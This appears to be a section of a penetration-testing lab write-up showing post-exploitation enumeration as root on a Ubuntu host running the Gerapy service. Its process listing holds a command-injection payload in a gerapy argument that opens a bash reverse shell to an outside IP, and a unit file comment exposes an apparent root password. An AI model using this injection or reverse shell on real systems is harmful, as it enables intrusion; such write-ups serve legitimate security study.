Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the root user after compromising the target system.
Firewall
root@ubuntu:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination app.service
root@ubuntu:~# systemctl status app.service
● app.service - Gerapy app service
Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2024-08-03 04:47:19 UTC; 8 months 1 day ago
Main PID: 844 (bash)
Tasks: 12 (limit: 2234)
Memory: 544.5M
CPU: 3min 864ms
CGroup: /system.slice/app.service
├─ 844 /bin/bash /home/app/run.sh
├─ 1039 /usr/bin/python3 /usr/local/bin/gerapy runserver 0.0.0.0:8000
├─ 1734 /bin/sh -c "gerapy parse --start False --method GET --url None --callback None --cookies '{}' --headers '{}' --meta '{}' --dont_filter False --priority 0 projects/3 \`/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.249/8000 0>&1'\`"
├─ 1735 /bin/bash -c "bash -i >& /dev/tcp/192.168.45.249/8000 0>&1"
├─ 1736 bash -i
└─10971 gpg-agent --homedir /home/app/.gnupg --use-standard-socket --daemon
root@ubuntu:~# cat /etc/systemd/system/app.service
[Unit]
Description=Gerapy app service
# root:4!m?C%7k@Xb?XNH0!>6K
[Service]
User=app
Type=simple
ExecStart=/bin/bash /home/app/run.sh
[Install]
WantedBy=multi-user.target
root@ubuntu:~# cat /home/app/run.sh
#!/bin/bash
cd /home/app
gerapy init
cd gerapy
gerapy migrate
gerapy initadmin
gerapy runserver 0.0.0.0:8000containerd.service
root@ubuntu:~# systemctl status containerd.service
● containerd.service - containerd container runtime
Loaded: loaded (/lib/systemd/system/containerd.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2024-08-03 04:47:20 UTC; 8 months 1 day ago
Docs: https://containerd.io
Main PID: 867 (containerd)
Tasks: 8
Memory: 51.0M
CPU: 1.475s
CGroup: /system.slice/containerd.service
└─867 /usr/bin/containerd
root@ubuntu:~# cat /lib/systemd/system/containerd.service
# Copyright The containerd Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
[Unit]
Description=containerd container runtime
Documentation=https://containerd.io
After=network.target local-fs.target
[Service]
ExecStartPre=-/sbin/modprobe overlay
ExecStart=/usr/bin/containerd
Type=notify
Delegate=yes
KillMode=process
Restart=always
RestartSec=5
# Having non-zero Limit*s causes performance problems due to accounting overhead
# in the kernel. We recommend using cgroups to do container-local accounting.
LimitNPROC=infinity
LimitCORE=infinity
LimitNOFILE=infinity
# Comment TasksMax if your systemd version does not supports it.
# Only systemd 226 and above support this version.
TasksMax=infinity
OOMScoreAdjust=-999
[Install]
WantedBy=multi-user.target